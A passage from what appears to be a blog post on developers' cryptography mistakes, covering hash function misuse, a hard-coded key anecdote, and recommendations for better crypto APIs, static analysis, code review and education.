Crypto soup often uses hash functions, and at this point you may want to have a second look at my final paragraph for point 5. When I see this, I want to scream to the developer “get your hands off that hash function, you don’t know what you’re doing!”

I remember one case of crypto soup where the developer used a hard-coded key. I told him that it is unclear what you are trying to do, but you cannot use hard-coded keys. This caused him a lot of trouble because they didn’t have a clear path forward to getting the key out of the source. Eventually, he explained that he didn’t really need security for what he was doing, but instead he was just trying to obfuscate. Huh? This is exactly the type of conversation one tends to get into when you see crypto soup.

Concluding remarks

To improve the state of crypto in developer code, I make the following recommendations:

  • We need more educators!  I’m talking about people who understand crypto and also developer code.  I am pleased to find some very good people on Stack Overflow, but it is still the case that there is a lot of bad guidance all over the internet.  More good people need to help correct this.
  • Crypto APIs need to get better.  Using cryptographic functionality correctly needs to be easy.  It needs to be secure by default.  And the documentation needs to be very clear about what is happening.  Microsoft is going the right direction, Java is not.
  • Static analysis tools need to improve.  Some of the issues above the tools will not be able to find, but others they should be able to.  I am aware of one called Cryptosense, but unfortunately I have not had the benefit to try it.  I have played a lot with big name tools and have been disappointed due to their lack of findings.
  • Code reviewers need to manually search for crypto problems.  It really is not that hard.  Start by doing a grep -Rli crypt (see how to do equivalent in Powershell) to get a list of files that contain the word “crypt”.  Also search for MD5 and so on.
  • Crypto researchers need to more attached to real-world security problems.  If people like Dan Boneh and his colleagues can do research like this, then others can as well.  We need a lot more help to clean up the world’s crypto mess.